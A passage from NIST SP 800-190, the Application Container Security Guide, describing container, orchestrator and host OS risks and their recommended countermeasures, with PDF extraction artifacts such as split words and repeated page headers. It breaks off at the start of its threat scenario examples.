account management practices and ‘orphaned’ accounts in the orchestrator because th ese 
systems are less rigorously managed. Because many of these accounts are highly privileged 
within the orchestrator, compromise of them can lead to systemwide compromise.  
Containers typically use data storage volumes that are managed by the orchestration tool and are 
not host specific. Because a container may run on any given node  within a cluster, the data 
required by the app within the container must be available to the container regardless of which  
host it  is running on. At the same time, many organiza tions manage data that must be encrypted 
at rest to prevent unauthorized access. 
3.3.3 Poorly separated inter -container network traffic 
In most containerized environments, traffic between individual nodes is routed over a virtual 
overlay network. This overlay ne twork is typically managed by the orchestrator and is often 
opaque to existing network security and management tools. For example, instead of seeing 
database queries being sent from a web server container to a database container on another host, 
traditiona l network filters would only see encrypted packets flowing between two hosts, with no 
visibility into the actual container endpoints, nor the traffic being sent. Although an encrypted 
overlay network provides many operational and security benefits, it can also create a security 
‘blindness’ scenario in which organizations are unable to effectively monitor traffic within their 
own networks.  
Potentially even more critical is the risk of traffic from different apps sharing the same virtual 
networks. If apps of  different sensitivity levels, such as a public- facing web site and an internal 
treasury management app , are using the same virtual network, sensitive internal apps may be 
exposed to greater risk from network attack. For example, if the public -facing web s ite is 
compromised, attackers may be able to use shared networks to attack the treasury app.  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
16 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 3.3.4 Mixing of workload sensitivity levels 
Orchestrators are typically focused primarily on driving the scale and density of workloads. This 
means that, by default, they can place workloads of differing sensitivity levels on the same host.  
For example, in a default configuration, an orchestrator m ay place a container running a public -
facing web server on the same host as one processing sensitive financial data, simply because 
that host happens to have the most available resources at the time of deployment. In the case of a 
critical vulnerability in  the web server, t his can put the container processing sensitive financial 
data at significantly greater risk of compromise.  
3.3.5 Orchestrator node trust  
Maintenance of trust between the nodes in the environment requires special care. The 
orchestrator is the mo st foundational  node . Weak orchestrator  configurations can expose the 
orchestrator and all other container technology components  to increased risk. Examples of 
possible consequences include:  
• Unauthorized hosts  joining the cluster and run ning container s 
• The compromise of a single cluster host  imply ing compromise of the entire cluster —for 
example, if the same key pairs used for authentication are shared across all nodes  
• Communications  between the orchestrator and DevOps personnel, administrators, and 
hosts  being unencrypted and unauthenticated  
3.4 Container Risks 
3.4.1 Vulnerabilities within the runtime software  
While relatively uncommon, vulnerabilities within the runtime software are  particularly 
dangerous if they allow ‘container escape’ scenarios in which malicious software can  attack 
resources in  other containers and the host OS itself. An attacker may also be able to exploit 
vulnerabilities to compromise the runtime software itself, and then alter that software so it allows 
the attacker to access other  containers, monitor container -to-container communications, etc.  
3.4.2 Unbounded network access from containers 
By default in most container runtimes, individual containers are able to access each other and the 
host OS over the network. If a container is compromised and acti ng maliciously, allowing this 
network traffic may expose other resources in the environment to risk. For example, a 
compromised container may be used to scan the network it is connected to in order to find other 
weaknesses for an attacker to exploit. This risk is related to that from poorly separated virtual 
networks, as discussed in Section 3.3.3, but different because it  is focused more on flows from 
containers to any outbound destination, not on app “ cross talk ” scenarios.  
Egress network access is more complex to manage in a containerized environment because so 
much of the connection is virtualized between containers. Thus, traffic from one container to 
another may appear simply as encapsulated packets on the network without  directly  indicating  
the ultimate source, destination, or payload. Tools and operational processes that are not 
container aware are not able to inspect this traffic or determine whether it represents a threat.  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
17 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 3.4.3 Insecure container runtime configurations 
Cont ainer runtimes typically expose many configurable options to administrators. Setting  them 
improperly can lower the relative security of the system. For example, on Linux container hosts, 
the set of allowed system calls is often limited by default to only t hose required for safe 
operation of containers. If this list is widened, it may expose containers and the host OS to 
increased risk from a compromised container.  Similarly , if a container is run in privileged mode, 
it has access to all the devices on the h ost, thus allowing it to essentially act as part of the host 
OS and impact all other containers running on it.  
Another example of an insecure runtime configuration is allowing containers to mount sensitive 
directories on the host. Containers should rarely make changes to the host OS file system and 
should almost never make changes to locations that control the basic functionality of the host OS  
(e.g., /boot or /etc for Linux containers, C: \Windows for Windows containers) . If a compromised 
container is allow ed to make changes to these paths, it  could be used to elevate privileges and 
attack the host itself as well as other containers running on the host.  
3.4.4 App vulnerabilities  
Even when organizations are taking the precautions recommended in this guide, containers may 
still be compromised due to flaws in the apps they run. This is not a problem with containers 
themselves, but instead is just the manifestation of typical software flaws within a container 
environment. For example, a containerized web app may be vulnerable to cross -site scripting 
vulnerabilities, and a database front end container may be subject to Structured Query Language 
(SQL ) injection. When a container is compromised, it can be misused  in many ways , such as 
granting unauthorized access to sensi tive information or enabling attacks against other containers 
or the host OS . 
3.4.5 Rogue containers 
Rogue containers are unplanned or unsanctioned containers in an environment . This can be a 
common occurrence , especially in development environments, where app developers may launch 
containers as a means of testing their code. If  these containers are not  put through the rigors of 
vulnerability scanning and proper configuration, they may  be more susceptible to exploits. 
Rogue containers therefore pose additional risk to the organization, especially when they persist 
in the environment without the awareness of development teams and security administrators.  
3.5 Host OS Risks 
3.5.1 Large attack surface  
Every host OS has an attack surface , which is the collection of all ways attackers can attempt to 
access and exploit the host OS’s vulnerabilities. For example, any network -accessible service 
provides a potential entry point for attackers, adding to the at tack surface. The larger the attack 
surface is, the better the odds are that an attacker can find and access a vulnerability, leading to a 
compromise of the host OS and the containers running on top of it. 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
18 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 3.5.2 Shared kernel 
Container -specific OSs have a much smaller attack surface than that of g eneral -purpose OSs. For 
example, they do not contain libraries and package managers that enable a general -purpose OS to 
directly run database and web server apps. However, although containers provide strong 
software- level isolation of resources, the use of a shared kernel invariably results in a larger 
inter- object attack surface than seen with hypervisors , even for container -specific OSs. In other 
words, the level of isolation provided by container runtimes is not as high as that provided by 
hypervisors.  
3.5.3 Host OS component vulnerabilities 
All host OSs, even container -specific ones, provide  foundational system components —for 
example, the cryptographic libraries used to authenticate remote connections and the kernel 
primitiv es used for general process invocation and management. Like any other software, these 
components can have vulnerabilities and, because they exist low in the container technology 
architecture , they can impact all the containers and apps that run on these hosts.  
3.5.4 Improper user access rights 
Container -specific O Ss are typically not optimized to support multiuser scenarios since 
interactive user logon should be rare.  Organizations are exposed to risk when users log on 
directly to hosts to manage containers, rather than going through an orchestration layer. Direct 
management enables wide- ranging changes to the system and all containers on it , and can 
potentially enable a user that only needs to manage a specific app’s containers to impact many 
others.  
3.5.5 Host OS file system tampering 
Insecure container configurations can expose host volumes to greater risk of file tampering. For 
example, if a container is allowed to mount sensitive directories on the host OS , that container 
can then change files in those directories. These changes could impact the stability and security 
of the host and all other containers running on it.  
 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
19 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 4 Countermeasures for Major Risks  
This section recommends  countermeasures for the major risks identified in Section 3.  
4.1 Image Countermeasures 
4.1.1 Image vulnerabilities 
There is a need for container  technology- specific vulnerability management tools and processes. 
Traditional vulnerability management tools make many assumptions about host durability and 
app update mechanisms and frequencies that are f undamentally misaligned with a containerized 
model. These tools are often unable to detect vulnerabilities within containers , leading to a false 
sense of safety.  
Organizations should use tools that take the pipeline -based build approach and immutable natu re 
of containers and images into their design to provide more actionable and reliable results. Key 
aspects of effective tools and processes include:  
1. Integration with the entire lifecycle of images, from the beginning of the build process, to 
whatever regis tries the organization is using, to runtime. 
2. Visibility into vulnerabilities at all layers of the image, not just the base layer of the 
image but also application frameworks and custom software the organization is using.  
Visibility should be centralized across the organization and provide flexible reporting and 
monitoring views aligned with organizations’ business processes.  
3. Policy -driven enforcement; organizations should be able to create “ quality gates”  at each 
stage of the build and deployment process to ensure that only images that meet the 
organization’s vulnerability and configuration policies  are allowed to progress. For 
example, organizations should be able to configure a rule in the build process to prevent 
the progression of images that include vulnerabilities with Common Vulnerability 
Scoring System  (CVSS) [18] ratings above a selected threshold.  
4.1.2 Image configuration defects  
Organizations should adopt tools and processes to validate and enforce compliance with secure 
configuration best practices. For example, images should be configured to run as non -privileged 
users. T ools and processes that should be adopted include:  
1. Validation of image configuration settings , including vendor recommendations and third -
party  best practices.  
2. Ongoing, continuously updated, centralized reporting and monitoring of image 
compliance state to identify weaknesses and risks at the organizational level.  
3. Enforcement of compliance requirements by optionally prevent ing the running of non-
compliant images.  
4. Use of base layers from trusted sources only, frequent updates of base layers , and 
selection of base layers from  minimalistic technologies like Alpine Linux and Windows 
Nano Server to reduce attack surface areas.  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
20 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 A final recommendation for image configuration is that SSH and other remote administration 
tools designed to provide remote shells to hosts should never be enabled within containers. 
Contai ners should be run in an immutable manner to derive the greatest security benefit from 
their use. Enabling remote access to them via these tools implies a degree of change that violates 
this principle and exposes them to greater risk of network- based attack. Instead, all remote 
management of containers should be done through the container runtime APIs, which may be 
accessed via orchestration tools, or by creating remote shell sessions to the host  on which the 
container is running.  
4.1.3 Embedded m alware 
Organizat ions should continuously monitor all images for embedded malware. The monitoring 
processes should include  the use of malware signature sets and behavioral detection heuristics 
based largely on actual “ in the wild ” attacks.  
4.1.4 Embedded clear text secrets 
Secrets should be stored outside of images and provided dynamically at runtime as needed. Most 
orchestrators , such as Docker Swarm and Kubernetes, include native  management  of secrets. 
These orchestrators not only provide secure storage  of secrets  and ‘just in time’ injection to 
containers, but also make it much simpler to integrate secret management into the build and 
deployment processes. For example, an organization could use these tools to securely provision 
the database connection string into a web app lication  container. The orchestrator can ensure that 
only the web application  container had access to this secret, that it is not persisted to disk, and 
that anytime the web app is deployed, the secret is provisioned into it.   
Organizations may a lso integrate their container deployments with existing enterprise secret 
management systems that are already in use for storing secrets in non -container environments.  
These tools typically provide APIs to retrieve secrets securely as containers are deplo yed, which 
eliminates the need to persist them within images.  
Regardless of the tool chosen, organizations should ensure that secrets are only provided to the 
specific containers that require them, based on a pre- defined and administrator -controlled settin g, 
and that secrets are always encrypted at rest  and in transit using Federal Information Processing 
Standard ( FIPS ) 140 approved cryptographic algorithms5 contained in validated  cryptographic 
modules . 
4.1.5 Use of untrusted images 
Organizations should maintain a set of trusted images and registries and ensure that only images 
from this set are allowed to run in their environment, thus mitigating the risk of untrusted or 
malicious components being deployed. 
To mitigate these risks, organizations should take a mul tilayered approach that  include s: 
                                                 
5  For more information on NIST -validated cryptographic implement ations, see the Cryptographic Module Validation Program 
(CMVP) page at https://csrc.nist.gov/groups/STM/cmvp/ . 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
21 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 • Capability to centrally control exactly what images and registries are trusted in their 
environment;  
• Discrete identification of each image by cryptographic signature, using a NIST -validated 
implementation6; 
• Enforcement to ensure that all hosts in the environment only run images from these 
approved lists;  
• Validation of image signatures before image execution to ensure images are from trusted 
sources and have not been tampered with;  and 
• Ongoing monitoring and maintenance of these repositories to ensure images within them 
are maintained and updated as vulnerabilities and configuration requirements change.  
4.2 Registry Countermeasures 
4.2.1 Insecure connections to registries 
Organizations should configure their  development tools, orchestrators, and container runtimes to 
only connect to registries over encrypted channels. The specific steps vary between tools , but the 
key goal is to ensure that all data pushed to and pulled from a registry occurs between trusted 
endpoints and is encrypted in transit.   
4.2.2 Stale images in registries 
The risk of using stale images can be mitigated through two primary methods. First, 
organizations can prune registries of unsafe, vulnerable images that should no longer be used.  
This proc ess can be automated based on time triggers and labels associated with images.  
Second, operational practices should emphasize accessing images using immutable names that 
specify discrete versions of images to be used. For example, rather than configuring a 
deployment job to use the image called my- app, configure it to deploy specific versions of the 
image, such as my -app:2.3 and my- app:2.4 to ensure that specific, known good instances of 
images are deployed as part of each job.  
Another option is using a “ latest ” tag for images and referencing this tag in deployment 
automation. However, because this tag is only a label attached to the image and not a guarantee 
of freshness, organizations should be cautious to not overly trust it. Regardless of whether an 
organization chooses to use discrete names or to use a “ latest ” tag, it  is critical that processes be 
put in place to ensure that either the automation is using the most recent unique name or the 
images tagged “ latest ” actually do represent the most up- to-date versions.  
4.2.3 Insufficient  authentication and authorization restrictions 
All access to registries that contain proprietary or sensitive images should require authentication.  
Any write access to a registry should require authentication to ensure that only i mages from 
trusted entities can be added to it. For example, only allow developers to push images to the 
specific repositories they  are responsible for, rather than being able to update any repository.  
                                                 
6  For more information on NIST -validated cryptographic implementations, see the Cryptogra phic Module Validation Program 
(CMVP) page at https://csrc.nist.gov/projects/cryptographic -module -validation -program .  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
22 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 Organizations  should consider federating  with existin g accounts, such as their own or a cloud 
provider’s directory service to take advantage of security controls already in place for those 
accounts. All write access to registries should be audited and any read actions for sensitive 
images should similarly be  logged.  
Registries also provide an opportunity to apply context -aware authorization controls to actions.  
For example, organizations can configure their continuous integration processes to allow images 
to be signed by the authorized personnel and pushed to a registry only after they  have  passed a 
vulnerability scan  and compliance assessment. Organizations should integrate these automated 
scans into their processes to prevent the promotion and deployment of vulnerable or 
misconfigured images. 
4.3 Orchestrator Countermeasures 
4.3.1 Unbounded administrative access 
Especially because of their wide -ranging span of control, orchestrators should use a least 
privilege access model in which users are only granted the ability to perform the specific actions 
on the specific hosts, containers, and images their job role s require . For example, members of the 
test team should only be given access to the images used in testing and the hosts used for running 
them, and should only be able to manipulate the containers they created. Tes t team members 
should have limited or no access to containers used in production.  
4.3.2 Unauthorized access 
Access to cluster -wide administrative accounts should be tightly controlled as these accounts 
provide ability to affect all resources in the environment. Organizations should use strong 
authentication methods, such as requiring multifactor authentication instead of just a password.  
Organizations should implement single sign -on to existing directory systems where applicable. 
Single sign -on simplifies the or chestrator authentication experience, makes it easier for users to 
use strong authentication credentials, and centralizes auditing of access, making anomaly 
detection more effective.  
Traditional approaches for data at rest encryption often involve the use of host -based capabilities 
that may be incompatible with containers. Thus, organizations should use tools for encrypting 
data used with containers that allow the  data to be accessed properly from containers regardless 
of the node they are running on. Such encryption tools should provide the same barriers to 
unauthorized access and tampering, using the same cryptographic approaches as those defined in 
NIST SP 800 -111 [19] .  
4.3.3 Poorly separated inter -container network traffic 
Orchestrators should be configured to separate network traffic into discrete virtual networks by 
sensitivity level. While per -app segmentation is also possible, for most organizations and use 
cases, simply  defining networks by sensitivity level provides sufficient mitigation of risk with a 
manageable degree of complexity. For example, public -facing apps can share a virtual network, 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
23 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 internal apps can use another, and communication between the two should occur through a small 
number of well -defined interfaces.  
4.3.4 Mixing of workload sensitivity levels  
Orchestrators should be configured to isolate deployments to specific sets of hosts by sensitivity 
levels. The particular approach for implementing this varies depe nding on the orchestrator in use, 
but the general model is to define rules that prevent high sensitivity workloads from being placed 
on the same host as those running lower sensitivity workloads. This can be accomplished 
through the use of host ‘pinning’ w ithin the orchestrator or even simply by having separate, 
individually managed clusters for each sensitivity level.  
While most container runtime environments do an effective job of isolating containers from each 
other and from the host OS, in some cases it  may be an unnecessary risk to run apps of different 
sensitivity levels together on the same host OS . Segmenting containers by purpose , sensitivity , 
and threat posture  provides additional defense in depth. Concepts such as application tiering and 
network a nd host segmentation should be taken into consideration when planning app 
deployments. For example, suppose  a host is running containers for both a financial database and 
a public -facing blog. While normally the container runtime will effectively  isolate these 
environments from each other, there is also a shared responsibility amongst the D evOps teams 
for each app to operate them securely and eliminate unnecessary risk . If the blog app were to be  
compromised  by an attacker , there would be  far fewer layers o f defense to protect the database if 
the two apps are running on the same host .  
Thus, a best practice is to group containers together by relative sensitivity and to ensure that a 
given host kernel only runs containers of a single sensitivity level. This s egmentation may be 
provided by using multiple physical servers, but modern hypervisors also provide strong enough 
isolation to effectively mitigate these risks. From the previous example, this may mean that the 
organization has two sensitivity levels for their containers. One is for financial apps and the 
database is included in that group. The other is for web apps and the blog is included in that 
group. The organization would then have two pools of VMs that would each host containers of a 
single severity level. For example, the host called vm -financial may host the containers running 
the financial database as well as the tax reporting software, while a host called vm -web may host 
the blog and the public website.  
By segmenting containers in this manner, it  will be much more difficult for an attacker who  
compromises one of the segments to expand that compromise to other segments. An attacker 
who compromises a single server would have  limited capabilities to perform reconnaissance and 
attacks on other containers of a similar sensitivity level and not have any additional access 
beyond it. This approach also ensures that any residual data, such as caches or local volumes 
mounted for temp files, stays within the data’s security zone. From the previous example, this 
zoning would ensure that any financial data cached locally and residually after container 
termination would never be available on a host running an app at a lower sensitivity level.  
In larger -scale environments with hundreds of hosts and thousands of containers, this 
segmentation must be automated to be practical to operationalize. Fortunately, common 
orchestration platforms typically include some notion of being able to group apps together, and 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
24 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 container security tools can use attributes like container names and labels to enforce security 
policies across them. In these environments, additional layers of defense in depth beyond simple 
host isolation may also leverage this segmentation. For example, an  organization may implement 
separate hosting zones or networks to not only isolate these containers within hypervisors but 
also to isolate their network traffic more discretely  such that traffic for apps of one sensitivity 
level is separate from that of ot her sensitivity levels . 
4.3.5 Orchestrator node trust  
Orchestration platforms should be configured to provide features that create a secure 
environment for all the apps they run. Orchestrators should ensure that nodes are secure ly 
introduced to the cluster, have  a persistent identity throughout their lifecycle, and can also 
provide an accurate inventory of nodes and their connectivity state s. Organizations should ensure 
that orchestration platforms are designed specifically to be resilient to compromise of individual 
nodes without compromising the overall security of the cluster. A compromised node must be 
able to be isolated and removed from the cluster without disrupting or degrading overall cluster 
operations. Finally, organizations should choose orchestrators that provide mutually 
authenticated network connections between cluster members and end -to-end encryption of intra -
cluster traffic. Because of the portability of containers, many deployments may occur across 
networks organizations do not directly control, so a secure- by-default posture is particularly 
important for this scenario.  
4.4 Container Countermeasures 
4.4.1 Vulnerabilities within the runtime software  
The container runtime must be carefully monitored for vulnerabilities , and when problems are 
detected, they must be remediated quickly. A vulnerable runtime exposes all containers it 
supports, as well as the host itself, to potentially significant risk. Organizations should use tools 
to look for Common Vulnerabilities and Exposures (CVEs) vulnerabilities in the runtimes 
deployed, to upgrade any instances at risk, and to ensure that orchestrators only allow 
deployments to properly maintained runtimes. 
4.4.2 Unbounded network access from containers 
Organizations should control the eg ress network traffic sent by containers. At minimum, these 
controls should be in place at network borders, ensuring containers are not able to send traffic 
across networks of differing sensitivity levels, such as from an environment hosting secure data 
to the internet, similar to the patterns used for traditional architectures. However, the virtualized 
networking model of inter -container traffic poses an additional challenge.   
Because containers deployed across multiple hosts typically communicate over a v irtual, 
encrypted network, traditional network devices are often blind to this traffic. Additionally, 
containers are typically assigned dynamic IP addresses automatically when deployed by 
orchestrators, and these addresses change continuously as the app is scaled and load balanced.  
Thus, ideally, organizations should use a combination of existing network level devices and 
more app- aware network filtering. App- aware tools should be able to not just see the inter -
container traffic, but also to dynamically ge nerate the rules used to filter this traffic based on the 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
25 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 specific characteristics of the apps running in the containers. This dynamic rule management is 
critical due to the scale and rate of change of containerized apps, as well as their ephemeral 
networking topology.  
Specifically, app -aware tools should provide the following capabilities:  
• Automated determination of proper container networking surfaces, including both 
inbound ports and process -port bindings;  
• Detection of traffic flows both between containers and other network entities, over both 
‘on the wire’ traffic and encapsulated traffic; and  
• Detection of network anomalies, such as unexpected traffic flows within the 
organization’s network , port scanning, or outbound access to potentially dangerous 
destinations.  
4.4.3 Insecure container runtime configurations 
Organizations should automate compliance with container runtime configuration standards. 
Documented technical implementation guidance, such as the Center for Internet Security Docker 
Benchmark  [20], provides details on options and recommended settings, but operationalizing this 
guidance depends on automation. Organizations can use a variety of tools to “ scan” and assess 
their co mpliance at a point in time, but such approaches do not scale. Instead, organizations 
should use tools or processes that continuously assess configuration settings across the 
environment and actively enforce them.  
Additionally, mandatory access control (MA C) technologies like SELinux [21 ] and AppArmor 
[22] provide enhanced control and isolation for containers  running Linux OSs . For example, 
these technologies can be used to provide additional segmentation and assurance that containers 
should only be able to access specific file paths, processes, and network sockets, further 
constraining the ability of even a compromised container to impact the host or other containers.  
MAC technologies provide protection at th e host OS layer, ensuring that only specific files , 
paths , and processes are accessible to containerized apps. Organizations are encouraged to use 
the MAC technologies provided by their host OSs  in all container deployment s. 
Secure computing (s eccomp )7 profiles are another mechanism that can be used to constrain the 
system -level capabilities containers are allocated at runtime. Common container runtimes like 
Docker include default seccomp profiles that drop system calls that are unsafe and typically 
unneces sary for container operation. Additionally, custom profiles can be created and passed to 
container runtimes to further limit their capabilities. At a minimum, organizations should ensure 
that containers are run with the default profiles provided by their runtime and should consider 
using additional profiles for high- risk apps. 
4.4.4 App vulnerabilities 
Existing host -based intrusion detection processes and tools are often unable to detect and prevent 
attacks within containers due to the differing technical archite cture and operational practices 
                                                 
7  For more information on seccomp, see https://www.kernel.org/doc/Documentation/prctl/seccomp_filter.txt .  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
26 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 previously discussed. Organizations should implement additional tools that are container aware 
and designed to operate at the scale and change rate typically seen with containers. These tools 
should be able to automatically profile containerized apps  using behavioral learning and build 
security profiles for them to minimize human interaction. These profiles should then be able to 
prevent and detect anomalies at runtime, including events such as:  
• Invalid or unexpected process execution,  
• Invalid or unexpected system calls,  
• Changes to protected configuration files and binaries,  
• Writes to unexpected locations and file types,  
• Creation of unexpected network listeners,  
• Traffic sent to unexpected network destinations, and 
• Malware stor age or execution.  
Containers should also  be run with their root filesystems in read -only mode. This approach 
isolates writes to specifically defined directories, which can then be more easily monitored by 
the aforementioned tools. Furthermore, using read- only filesystems makes the containers more 
resilient to compromise since any tampering is isolated to these specific locations and can be 
easily separated from the rest of the app.  
4.4.5 Rogue containers 
Organizations should institute separate environments for d evelopment, test, production, and 
other scenarios , each with specific controls to provide role- based access control for container 
deployment and management activities. All container creation should be associated with 
individual user identities  and logged to provide a clear audit trail of activity. Further, 
organizations are encouraged to use security tools that can enforce baseline requirements for 
vulnerability management and compliance prior to allowing an image to be run. 
4.5 Host OS Countermeasures 
4.5.1 Large attack surface  
For organizations using container -specific OSs, the threats are typically more minimal to start 
with since the OSs are specifically designed to host containers and have other services and 
functionality disabled. Further, because these optimized OSs are designed specifically for 
hosting containers, they typically feature read- only file systems and employ other hardening 
practices by default. Whenever possible, organizations should use these minimalistic OSs to 
reduce their attack surfaces and mitigate the typical risks and hardening activities associated with 
general -purpose OSs.  
Organization s that cannot use a container -specific OS should follow the guidance in NIST SP 
800-123, Guide to General Server Security [23]  to reduce the attack surface of their host s as 
much as possible. For example, hosts that run containers should only run containers and not run 
other apps, like a web server or database, outside of containers. The host OS should not run 
unnecessary system services, such as a print spooler, that increase its attack and patching surface 
areas . Finally, hosts should be continuously scanned for vulnerabilities and updates applied 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
27 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 quickly, no t just to the container runtime but also to lower- level components such as the kernel 
that containers rely upon for secure, compartmentalized operation.  
4.5.2 Shared kernel 
In addition to grouping container workloads onto hosts by sensitivity level, organization s should 
not mix containerized and non- containerized workloads on the same host instance. For example, 
if a host is running a web server container, it should not also run a web server (or any other app) 
as a regularly installed component directly within th e host OS . Keeping containerized workloads 
isolated to container -specific hosts makes it simpler and safer to apply countermeasures and 
defenses that are optimized for protecting containers.  
4.5.3 Host OS component vulnerabilities 
Organizations should implement management practices and tools to validate the versioning of 
components provided for base OS management and functionality. Even though container -
specific OSs have a much more minimal set of components than general -purpose OSs, they still 
do have vulnerabil ities and still require remediation. Organizations should use tools provided by 
the OS vendor or other trusted organizations to regularly check for and apply updates to all 
software components used within the OS. The OS should be kept up to date not only w ith 
security updates, but also the latest component updates recommended by the vendor. This is 
particularly important for the kernel and container runtime components as newer releases of 
these components often add additional security protections and capabi lities beyond simply 
correcting vulnerabilities.  Some organizations may choose to simply redeploy new OS instances 
with the necessary updates, rather than updating existing systems. This approach is also valid, 
although it often requires more sophisticated  operational practices.  
Host OSs  should be operated in an immutable manner with no data or state stored uniquely and 
persistently on the host and no application -level dependencies provided by the host. Instead, all 
app components and dependencies should be  packaged and deployed in containers. This enables 
the host to be operated in a nearly stateless manner with a greatly reduced attack surface.  
Additionally, it provides  a more trustworthy way to identify anomalies and configuration drift.  
4.5.4 Improper user access rights 
Though most container deployments rely on orchestrators to distribute jobs across hosts, 
organizations should still ensure that all authentication to the OS is audited,  login anomalies are 
monitored, and any escalation to perform privileged o perations is logged. This makes it possible 
to identify anomalous access patterns such as an individual logging on to a host directly and 
running privileged commands  to manipulate containers.  
4.5.5 Host file system tampering 
Ensure that containers are run with t he minimal set of file system permissions required. Very 
rarely should containers mount local file systems on a host . Instead, any file changes that 
containers need to persist to disk should be made withi n storage volumes specifically allocated 
for this purpose. In no case should containers be able to mount sensitive directories on a host’s 
file system, especially those containing configuration settings  for the operating system.  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
28 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 Organizations should use tools that can monitor what directories are being mounted by 
containers and prevent the deployment of containers that violate these policies.  
4.6 Hardware Countermeasures 
Software -based security is regularly defeated, as acknowledged in NIST SP 800 -164 [24 ]. NIST 
defines trusted computing re quirements in NIST SP s 800- 147 [25 ], 800- 155 [26 ], and 800- 164. 
To NIST, “trusted” means that the platform behaves as it is expected to: the software inventory is 
accurate, the configuration settings and security c ontrols are in place and operating as they 
should, and so on. “Trusted” also means that it is known that no unauthorized person has 
tampered with the software or its configuration on the hosts. Hardware root of trust is not  a 
concept unique to containers, but container management and security tools can leverage 
attestations for the rest of the container technology architecture  to ensure containers are being 
run in secure environments.  
The currently available way to provide trusted computing is to:  
1. Measure firmware, software , and configuration data before it  is executed using a Root of 
Trust for Measurement (RTM).  
2. Store those measurements in a hardware root of trust, like a trusted platform module 
(TPM ). 
3. Validate that the current measurements match the expected measurement s. If so, it can be 
attested that the platform can be trusted to behave as expected . 
TPM -enabled devices can check the integrity of the machine during the boot process, enabling 
protection and detection mechanisms to function in hardwar e, at pre -boot, and in the secure boot 
process. This same trust and integrity assurance can be extended beyond the OS  and the boot 
loader to the container runtimes and apps. Note that while standards are being developed to 
enable verification of hardware t rust by users of cloud services, not all clouds expose this 
functionality to their customers. In cases where technical verification is not provided, 
organizations should address hardware trust requirements as part of their service agreements with 
cloud providers. 
The increasing complexity of systems and the deeply embedded nature of today’s threats means 
that security should extend across all container technology components , starting with  the 
hardware and firmware. This would form a distributed trusted computing model and provide the 
most trusted and secure way to build, run, orchestrate , and manage containers.  
The trusted com puting model should start with m easured/secure b oot, which provides a verified 
system platform, and build a chain of t rust rooted in hardware and extended to the bootloaders, 
the OS kernel, and the OS components to enable cryptographic verification of boot mechanisms, 
system images, container runtimes, and container images. For  container technologies , these 
techniques are currently applicable at the hardware, hypervisor, and host OS layers, with early 
work in progress to apply these to container -specific components.  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
29 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 As of this writing, NIST is collaborating with industry partners to build reference architectures 
based on c ommercial off- the-shelf products that demonstrate the trusted computing model for 
container environments.8 
 
                                                 
8  For more information on previous NIST efforts in this area, see NIST IR 7904, Trusted Geolocation in the Cloud: Proof of 
Concept Implementation  [27].  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
30 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 5 Container Threat Scenario Examples 
To illustrate the effectiveness of the recommended countermeasures from Section 4, consider the 
following threat scenario  examples for containers.  
5.1 Exploit of a Vulnerability within an I mage 
One of the most common threats to a containerized environment is application- level 
vulnerabilities in the software within containers. For example, an organization may build an 
image based on a common web app. If that app has a vulnerability, it may be used to subvert the 
app within the container. Once compromised, the attacker may be able to map other systems in 
the environment, attempt to elevate privilege s within  the compromised container, or abuse the 
container for use in attacks on other systems (such as acting as a file dropper or command and 
control endpoint).  
Organizations that adopt  the recommended countermeasures would have multiple layers of 
defense in dep th against such threats:  
1. Detecting the vulnerable image early in the deployment process and having controls in 
place to prevent vulnerable images from being deployed would prevent the vulnerability 
from being introduced into production. 
2. Container -aware net work monitoring and filtering would detect anomalous connections 
to other containers during the attempt to map other systems . 
3. Container -aware process monitoring and malware detection would detect the running of 
invalid or unexpected malicious processes and the data they introduce into the 
environment .  
5.2 Exploit of the C ontainer Runtime  
While a n uncommon occurrence, if a container runtime were compromised, an attacker could 
utilize this access to attack all the containers on the host and even the host itself.  
Relevant mitigations for this threat scenario include:  
1. The usage of mandatory access control capabilities can provide additional barriers to 
ensure that process and file system activity is still segmented within the defined 
boundaries.  
2. Segmentation of wor kloads ensures that the scope of the compromise would be limited to 
apps of a common sensitivity level that are sharing the host. For example, a compromised 
runtime on a host only running web apps would not impact runtimes on other hosts 
running containers  for financial apps. 
3. Security tools that can report on the vulnerability state of runtimes and prevent the 
deployment of images to vulnerable runtimes can prevent workloads from running there. 
5.3 Running a Poisoned Image 
Because images are easily sourced from  public locations, often with unknown provenance, an 
attacker may embed malicious software within images known to be used by a target. For 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
31 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 example, if an attacker determines that a target is active on a discussion board about a particular  
